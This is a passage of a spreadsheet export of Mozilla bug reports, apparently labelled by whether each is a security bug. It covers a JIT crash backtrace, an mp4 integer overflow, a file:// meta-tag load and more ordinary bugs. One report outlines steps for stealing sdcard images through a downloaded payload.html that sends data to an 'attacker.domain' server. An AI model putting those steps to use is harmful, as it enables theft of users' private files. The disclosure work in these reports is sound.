#33 0x0867cb31 in js::jit::Simulator::call (this=&lt;optimized out&gt;, entry=entry@entry=0xf7fc91f8 "\377\377\377\352\360O-\351\377\377\377\352\004\320M\342\377\377\377\352\020\212-\355\377\377\377\352\r\200\240\341\377\377\377\352h\220\235\345\377\377\377\352\r\260\240\341\377\377\377\352t\240\235\345\377\377\377", &lt;incomplete sequence \352&gt;, argument_count=&lt;optimized out&gt;, argument_count@entry=8) at js/src/jit/arm/Simulator-arm.cpp:4415
#34 0x08438c59 in EnterBaseline (cx=cx@entry=0xf7a80040, data=...) at js/src/jit/BaselineJIT.cpp:124
#35 0x0849e539 in js::jit::EnterBaselineAtBranch (cx=0xf7a80040, fp=0xf56b6080, pc=0xf7a8d961 "う\232") at js/src/jit/BaselineJIT.cpp:228
#36 0x082be493 in Interpret (cx=cx@entry=0xf7a80040, state=...) at js/src/vm/Interpreter.cpp:2024
#37 0x082bf549 in js::RunScript (cx=cx@entry=0xf7a80040, state=...) at js/src/vm/Interpreter.cpp:655
#38 0x082c76a5 in js::ExecuteKernel (cx=cx@entry=0xf7a80040, script=..., script@entry=..., scopeChainArg=..., thisv=..., newTargetValue=..., type=type@entry=js::EXECUTE_GLOBAL, evalInFrame=evalInFrame@entry=..., result=result@entry=0x0) at js/src/vm/Interpreter.cpp:895
#39 0x082c7ac0 in js::Execute (cx=cx@entry=0xf7a80040, script=script@entry=..., scopeChainArg=..., rval=rval@entry=0x0) at js/src/vm/Interpreter.cpp:929
#40 0x08705644 in ExecuteScript (cx=cx@entry=0xf7a80040, scope=..., script=script@entry=..., rval=rval@entry=0x0) at js/src/jsapi.cpp:4325
#41 0x08705836 in JS_ExecuteScript (cx=cx@entry=0xf7a80040, scriptArg=scriptArg@entry=...) at js/src/jsapi.cpp:4356
#42 0x0806b3c9 in RunFile (compileOnly=false, file=0xf7ae39e0, filename=0xffffcf5f "min.js", cx=0xf7a80040) at js/src/shell/js.cpp:446
#43 Process (cx=cx@entry=0xf7a80040, filename=0xffffcf5f "min.js", forceTTY=forceTTY@entry=false) at js/src/shell/js.cpp:564
#44 0x080c7430 in ProcessArgs (op=0xffffcb80, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:5909
#45 Shell (envp=&lt;optimized out&gt;, op=0xffffcb80, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:6178
#46 main (argc=9, argv=0xffffccd4, envp=0xffffccfc) at js/src/shell/js.cpp:6522
eax	0xffffab48	-21688
ebx	0x984c47c	159695996
ecx	0x10c	268
edx	0x0	0
esi	0xffffa718	-22760
edi	0x0	0
ebp	0xffff9ed8	4294942424
esp	0xffff9e80	4294942336
eip	0x8696290 &lt;js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler&gt;::finishPool()+1360&gt;
=&gt; 0x8696290 &lt;js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler&gt;::finishPool()+1360&gt;:	rep movsl %ds:(%esi),%es:(%edi)
   0x8696292 &lt;js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler&gt;::finishPool()+1362&gt;:	testb  $0x2,-0x1c(%ebp)
I'm marking this s-s because I'm not entirely sure if this is a null crash or not.</t>
        </is>
      </c>
      <c r="X6226" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6227">
      <c r="A6227" t="n">
        <v>1154683</v>
      </c>
      <c r="B6227" t="inlineStr">
        <is>
          <t>2015-04-15 04:50:14 -0700</t>
        </is>
      </c>
      <c r="C6227" t="inlineStr">
        <is>
          <t>Integer overflow in libstagefright (data tag in mp4) might lead to heap overflow</t>
        </is>
      </c>
      <c r="D6227" t="inlineStr">
        <is>
          <t>2024-05-30 09:00:21 -0700</t>
        </is>
      </c>
      <c r="E6227" t="n">
        <v>1</v>
      </c>
      <c r="F6227" t="n">
        <v>1</v>
      </c>
      <c r="G6227" t="n">
        <v>3</v>
      </c>
      <c r="H6227" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6227" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6227" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K6227" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6227" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6227" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6227" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6227" t="inlineStr">
        <is>
          <t>[adv-main38+][see bug 1158568 and don't open until July 8]</t>
        </is>
      </c>
      <c r="Q6227" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6227" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6227" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T6227" t="n">
        <v>1</v>
      </c>
      <c r="U6227" t="n">
        <v>0</v>
      </c>
      <c r="V6227" t="n">
        <v>28</v>
      </c>
      <c r="W6227" t="inlineStr">
        <is>
          <t>Created attachment 8592760
integer overflow PoC
A specially crafted mp4 file can cause a integer overflow in the MPEG4Extractor::parseMetaData() function. When 'size' is 0xffffffff a integer overflow will occur which leads to an allocation of a (almost) 0 bytes big buffer (https://dxr.mozilla.org/mozilla-central/source/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#2196).
Later the 0xffffffff bytes should be copied into the small buffer 'buffer' which would lead to a heap overflow.
Attached is a PoC which causes the integer overflow. On the tested firefox (build from mozilla-central) using a Nexus 5 (contrary to the expected behavior) no heap overflow occurred. This behavior might be caused by the implementation of read(). read() is called (with the anticipated 0xffffffff as size) but no write into the buffer occurs.</t>
        </is>
      </c>
      <c r="X6227" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6228">
      <c r="A6228" t="n">
        <v>638018</v>
      </c>
      <c r="B6228" t="inlineStr">
        <is>
          <t>2011-03-01 22:49:22 -0800</t>
        </is>
      </c>
      <c r="C6228" t="inlineStr">
        <is>
          <t>[1.9.2] crash [@ ycc_rgb_convert] on image with src set to a resource with multipart/x-mixed-replace content type</t>
        </is>
      </c>
      <c r="D6228" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:56 -0700</t>
        </is>
      </c>
      <c r="E6228" t="n">
        <v>1</v>
      </c>
      <c r="F6228" t="n">
        <v>1</v>
      </c>
      <c r="G6228" t="n">
        <v>3</v>
      </c>
      <c r="H6228" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6228" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6228" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6228" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L6228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6228" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6228" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q6228" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6228" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6228" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6228" t="n">
        <v>1</v>
      </c>
      <c r="U6228" t="n">
        <v>0</v>
      </c>
      <c r="V6228" t="n">
        <v>40</v>
      </c>
      <c r="W6228" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Visiting a webpage that contains multiple images with the src-attribute that refers to a multipart/x-mixed-replace resource , Firefox 3.6.14 on windows crashes after some time with [Access_Violation_Write].
Tested on Windows 7
Reproducible: Always
Steps to Reproduce:
1. Visit test page
2. wait a few moments
Actual Results:  
Firefox crashes
Expected Results:  
Firefox don't crash
Like bug 610601 , This crash is very intermittent , sometimes firefox will crash after some seconds , and sometimes firefox don't crash at all.</t>
        </is>
      </c>
      <c r="X6228" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6229">
      <c r="A6229" t="n">
        <v>1145607</v>
      </c>
      <c r="B6229" t="inlineStr">
        <is>
          <t>2015-03-20 07:33:02 -0700</t>
        </is>
      </c>
      <c r="C6229" t="inlineStr">
        <is>
          <t>Push Socorro Release 20150320</t>
        </is>
      </c>
      <c r="D6229" t="inlineStr">
        <is>
          <t>2015-03-20 07:38:05 -0700</t>
        </is>
      </c>
      <c r="E6229" t="n">
        <v>1</v>
      </c>
      <c r="F6229" t="n">
        <v>1</v>
      </c>
      <c r="G6229" t="n">
        <v>4</v>
      </c>
      <c r="H6229" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6229" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6229" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6229" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6229" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6229" t="inlineStr"/>
      <c r="Q6229" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6229" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6229" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6229" t="n">
        <v>1</v>
      </c>
      <c r="U6229" t="n">
        <v>0</v>
      </c>
      <c r="V6229" t="n">
        <v>2</v>
      </c>
      <c r="W6229" t="inlineStr">
        <is>
          <t>https://ci.mozilla.org/job/socorro-release/1658/artifact/socorro.tar.gz</t>
        </is>
      </c>
      <c r="X6229" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6230">
      <c r="A6230" t="n">
        <v>700236</v>
      </c>
      <c r="B6230" t="inlineStr">
        <is>
          <t>2011-11-07 00:10:41 -0800</t>
        </is>
      </c>
      <c r="C6230" t="inlineStr">
        <is>
          <t>[Firefox Aurora] Implement Firefox Aurora Facebook Page</t>
        </is>
      </c>
      <c r="D6230" t="inlineStr">
        <is>
          <t>2012-02-13 19:38:49 -0800</t>
        </is>
      </c>
      <c r="E6230" t="n">
        <v>1</v>
      </c>
      <c r="F6230" t="n">
        <v>1</v>
      </c>
      <c r="G6230" t="n">
        <v>5</v>
      </c>
      <c r="H6230" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6230" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J6230" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="K6230" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6230" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6230" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6230" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6230" t="inlineStr"/>
      <c r="Q6230" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6230" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6230" t="inlineStr">
        <is>
          <t>4.7</t>
        </is>
      </c>
      <c r="T6230" t="n">
        <v>1</v>
      </c>
      <c r="U6230" t="n">
        <v>0</v>
      </c>
      <c r="V6230" t="n">
        <v>32</v>
      </c>
      <c r="W6230" t="inlineStr">
        <is>
          <t>Hi Steven, 
We are in the process of introducing a Firefox Aurora Facebook Page (facebook.com/FirefoxAurora)
Ty is currently working on finalizing designs of the Welcome tab (698913) and Download Tab (bug 698918) and we are expecting the final designs in the next couple of days.
Would you be able to help us out in implementing the Welcome and Download tabs in the Firefox Aurora page before the end of this week? Ideally, I would like to have the page live by the next Firefox Aurora update becomes available.
I am copying WilliamR in the bug if you have any questions regarding the implementation process in the facebook page. 
He implemented the last once: http://www.facebook.com/FutureOfFirefox
thanks!</t>
        </is>
      </c>
      <c r="X6230" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6231">
      <c r="A6231" t="n">
        <v>17671</v>
      </c>
      <c r="B6231" t="inlineStr">
        <is>
          <t>1999-11-01 11:34:04 -0800</t>
        </is>
      </c>
      <c r="C6231" t="inlineStr">
        <is>
          <t>[PDT] [DEMO] Incorrect behavior for "onclick" GIF</t>
        </is>
      </c>
      <c r="D6231" t="inlineStr">
        <is>
          <t>2001-09-05 10:39:16 -0700</t>
        </is>
      </c>
      <c r="E6231" t="n">
        <v>0</v>
      </c>
      <c r="F6231" t="n">
        <v>0</v>
      </c>
      <c r="G6231" t="n">
        <v>3</v>
      </c>
      <c r="H6231" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6231" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6231" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6231" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6231" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6231" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N6231" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6231" t="inlineStr"/>
      <c r="Q6231" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6231" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6231" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6231" t="n">
        <v>1</v>
      </c>
      <c r="U6231" t="n">
        <v>0</v>
      </c>
      <c r="V6231" t="n">
        <v>11</v>
      </c>
      <c r="W6231" t="inlineStr">
        <is>
          <t>1. Load
http://client/demo/external/gecko/eden/eden1028/content/form_write_mail/write_ma
il.html
2. Resize Window (e.g., make a bit larger) to get graphics to display correctly
(this is another bug 17574).
3. Clicking on the "Send Now" graphic in the upper right should bring up a
dialog, on which clicking OK dismisses both the dialogue and the original page.
Note:  Can work "correctly" if you click on the three or so pixels in the left
or lower left of the "send now" icon.
thx,
kevin</t>
        </is>
      </c>
      <c r="X6231" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6232">
      <c r="A6232" t="n">
        <v>1420049</v>
      </c>
      <c r="B6232" t="inlineStr">
        <is>
          <t>2017-11-22 21:43:56 -0800</t>
        </is>
      </c>
      <c r="C6232" t="inlineStr">
        <is>
          <t>Activity Stream screenshots can be coerced to (attempt to) load File:// URIs</t>
        </is>
      </c>
      <c r="D6232" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E6232" t="n">
        <v>1</v>
      </c>
      <c r="F6232" t="n">
        <v>1</v>
      </c>
      <c r="G6232" t="n">
        <v>2</v>
      </c>
      <c r="H6232" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6232" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6232" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K6232" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6232" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6232" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6232" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6232" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6232" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T6232" t="n">
        <v>1</v>
      </c>
      <c r="U6232" t="n">
        <v>0</v>
      </c>
      <c r="V6232" t="n">
        <v>39</v>
      </c>
      <c r="W6232" t="inlineStr">
        <is>
          <t>In 1393924 we introduced functionality to pull images references from meta tags, so that we show better screenshots on the newtab page. I'm not sure if the screenshot code is new or existing, but as a consequence, web pages can the content process to attempt a load of a local file. Luckily the sandbox stops the load, but it seems bad that the load  is even attempted.
STR:
Create a page with a tag like: 
&lt;meta name="twitter:image" content="file:///Users/paul/Pictures/dog.jpg"&gt;
Expected results: nothing loads
Actual results:
Error message observable in system console:
getScreenshot error: Error: page-thumbnail:error
After turning on sandbox logging (set security.sandbox.logging.enabled to true), I noticed the content process failing to access a file, using OSX console:
"SandboxViolation: plugin-container(39465) deny file-read-metadata /Users/paul/Pictures/dog.jpg"
The code in ContentMetaHandler[1]  doesnt seem to do any validation of the data pulled out of the content page. That sounds dangerous to me, but Im not sure if the expectation is that sanitzation/validation happens later.
[1] https://searchfox.org/mozilla-central/source/browser/modules/ContentMetaHandler.jsm#74
== Impact==
Allowing web pages to coerce chrome privileged requests (I assume this is chrome privileged since the file load occurs) is dangerous. I don't _think_ there is any way to exploit this directly since a) the content doesnt come back to the web and b) sandboxing adds a layer of defense. But not fixing this seems like it would be asking for future trouble if this bug could be chained with something else.</t>
        </is>
      </c>
      <c r="X6232" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6233">
      <c r="A6233" t="n">
        <v>1558299</v>
      </c>
      <c r="B6233" t="inlineStr">
        <is>
          <t>2019-06-10 12:44:20 -0700</t>
        </is>
      </c>
      <c r="C6233" t="inlineStr">
        <is>
          <t>file: URIs SOP Bypass: local HTML file can lead to file stealing (similar to CVE-2015-7186)</t>
        </is>
      </c>
      <c r="D6233" t="inlineStr">
        <is>
          <t>2024-06-04 07:12:21 -0700</t>
        </is>
      </c>
      <c r="E6233" t="n">
        <v>1</v>
      </c>
      <c r="F6233" t="n">
        <v>1</v>
      </c>
      <c r="G6233" t="n">
        <v>3</v>
      </c>
      <c r="H6233" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6233" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6233" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K6233" t="inlineStr">
        <is>
          <t>67 Branch</t>
        </is>
      </c>
      <c r="L6233" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6233" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6233" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6233" t="inlineStr">
        <is>
          <t>[bcs:p1][adv-main68+]</t>
        </is>
      </c>
      <c r="Q6233" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6233" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6233" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T6233" t="n">
        <v>1</v>
      </c>
      <c r="U6233" t="n">
        <v>0</v>
      </c>
      <c r="V6233" t="n">
        <v>37</v>
      </c>
      <c r="W6233" t="inlineStr">
        <is>
          <t>Created attachment 9071074
In this zip there are download.php base64.php test.html payload.html to reproduce the problem.
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36
Steps to reproduce:
STEP TO REPROCUDE
1) Upload all the files from zip to your server
2) Edit files - replace attacker.domain with your server domain
3) Add a small image (&lt;2kb, max 50x50) in /sdcard/Download/test.jpeg [I have used this path because it is easy and I have used a little image because so the code of the proof of concept is easy, but it is possible to replicate with every image]
4) With Firefox 67.0 open attacker.domain/test.html
5) Firefox will download the file payload.html and will save it in /sdcard/Download (by default)
6) Open with Firefox the downloaded file payload.html and wait some seconds
7) The base64 string of test.jpeg should be in image.txt
Tested on Samsung Galaxy S6 with Android 7.0 and Firefox 67.0
In the PoC.zip you find: 
- test.html
- download.php, that downloads the file payload.html
- the malicious file payload.html
- base64.php to convert an image into base64 and steal it
Sorry for my english.
Actual results:
It is possible to steal files from sdcard, in particular it is easy to steal the images. In my opinion it is a serious problem because it is really easy to find some paths (e.g. /sdcard/Whatsapp/Media/WhatsApp Images/ and the images have easy name: IMG-AAAAMMDD-WAXXXX.jpg where XXXX is a number like 0000, 0001, and so)
Expected results:
In Chrome, or Microsoft Edge, or Samsung Browser this doesn't append because there is a different Same Origin Policy. I think that it is important, because it is possible to receive an HTML file in a chat (like WhatsApp), download it and open it with Firefox. So in my opinion this is a bug.</t>
        </is>
      </c>
      <c r="X6233" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6234">
      <c r="A6234" t="n">
        <v>68828</v>
      </c>
      <c r="B6234" t="inlineStr">
        <is>
          <t>2001-02-14 11:41:08 -0800</t>
        </is>
      </c>
      <c r="C6234" t="inlineStr">
        <is>
          <t>Can't drag to file messages in folder pane.</t>
        </is>
      </c>
      <c r="D6234" t="inlineStr">
        <is>
          <t>2001-07-12 16:15:24 -0700</t>
        </is>
      </c>
      <c r="E6234" t="n">
        <v>1</v>
      </c>
      <c r="F6234" t="n">
        <v>1</v>
      </c>
      <c r="G6234" t="n">
        <v>3</v>
      </c>
      <c r="H6234" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6234" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6234" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K6234" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6234" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M6234" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N6234" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6234" t="inlineStr">
        <is>
          <t>[nsbeta1+]</t>
        </is>
      </c>
      <c r="Q6234" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6234" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6234" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T6234" t="n">
        <v>1</v>
      </c>
      <c r="U6234" t="n">
        <v>0</v>
      </c>
      <c r="V6234" t="n">
        <v>16</v>
      </c>
      <c r="W6234" t="inlineStr">
        <is>
          <t>- open mail, 2 pane, folder and thread
- drag a mesage from the thread pane into the folder pane
no drag feedback, dropping on a folder bounches back, denied. 2/12/01 opt build.</t>
        </is>
      </c>
      <c r="X6234" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6235">
      <c r="A6235" t="n">
        <v>117718</v>
      </c>
      <c r="B6235" t="inlineStr">
        <is>
          <t>2002-01-02 07:14:20 -0800</t>
        </is>
      </c>
      <c r="C6235" t="inlineStr">
        <is>
          <t>Mass Change removes a bugs groupset if the bug was in the wrong product group</t>
        </is>
      </c>
      <c r="D6235" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E6235" t="n">
        <v>1</v>
      </c>
      <c r="F6235" t="n">
        <v>1</v>
      </c>
      <c r="G6235" t="n">
        <v>4</v>
      </c>
      <c r="H6235" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6235" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6235" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K6235" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L6235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6235" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6235" t="inlineStr"/>
      <c r="Q6235" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6235" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6235" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T6235" t="n">
        <v>1</v>
      </c>
      <c r="U6235" t="n">
        <v>0</v>
      </c>
      <c r="V6235" t="n">
        <v>17</v>
      </c>
      <c r="W6235" t="inlineStr">
        <is>
          <t>I was just looking into bug 113975 and notice that $comma always seemed to be 
set for me even though I purposfully hadn't seleted anything to change on the 
mass form.  That lead me to discover that DoComma() was being called from line 
568 which should only be called if either $groupAdd or $groupDel was set.  As 
it tuned out, $groupDel was set to be the sum of every group I was in.  I 
tested a mass change of a secure bug, making sure that the "Don't change
this group restriction" button was selected, and sure enough, it removed the 
bug from the group.</t>
        </is>
      </c>
      <c r="X6235" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6236">
      <c r="A6236" t="n">
        <v>620540</v>
      </c>
      <c r="B6236" t="inlineStr">
        <is>
          <t>2010-12-20 15:13:53 -0800</t>
        </is>
      </c>
      <c r="C6236" t="inlineStr">
        <is>
          <t>Security Advisory for Bugzilla 4.0rc2, 3.6.4, 3.4.10 and 3.2.10</t>
        </is>
      </c>
      <c r="D6236" t="inlineStr">
        <is>
          <t>2011-01-24 17:22:35 -0800</t>
        </is>
      </c>
      <c r="E6236" t="n">
        <v>1</v>
      </c>
      <c r="F6236" t="n">
        <v>1</v>
      </c>
      <c r="G6236" t="n">
        <v>4</v>
      </c>
      <c r="H6236" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6236" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6236" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K6236" t="inlineStr">
        <is>
          <t>3.2.9</t>
        </is>
      </c>
      <c r="L6236" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6236" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6236" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6236" t="inlineStr"/>
      <c r="Q6236" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6236" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6236" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6236" t="n">
        <v>1</v>
      </c>
      <c r="U6236" t="n">
        <v>0</v>
      </c>
      <c r="V6236" t="n">
        <v>25</v>
      </c>
      <c r="W6236" t="inlineStr">
        <is>
          <t>We have several moderate to critical security bugs to fix for 4.0rc2 &amp; co. I also include the CGI.pm one, hoping a new version will be released on time on CPAN.
CVE ref welcome.</t>
        </is>
      </c>
      <c r="X6236" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6237">
      <c r="A6237" t="n">
        <v>852442</v>
      </c>
      <c r="B6237" t="inlineStr">
        <is>
          <t>2013-03-19 00:30:46 -0700</t>
        </is>
      </c>
      <c r="C6237" t="inlineStr">
        <is>
          <t>[fireplace] Forward (popState) busted</t>
        </is>
      </c>
      <c r="D6237" t="inlineStr">
        <is>
          <t>2013-04-08 14:39:24 -0700</t>
        </is>
      </c>
      <c r="E6237" t="n">
        <v>1</v>
      </c>
      <c r="F6237" t="n">
        <v>1</v>
      </c>
      <c r="G6237" t="n">
        <v>6</v>
      </c>
      <c r="H6237" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6237" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J6237" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K6237" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L6237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6237" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
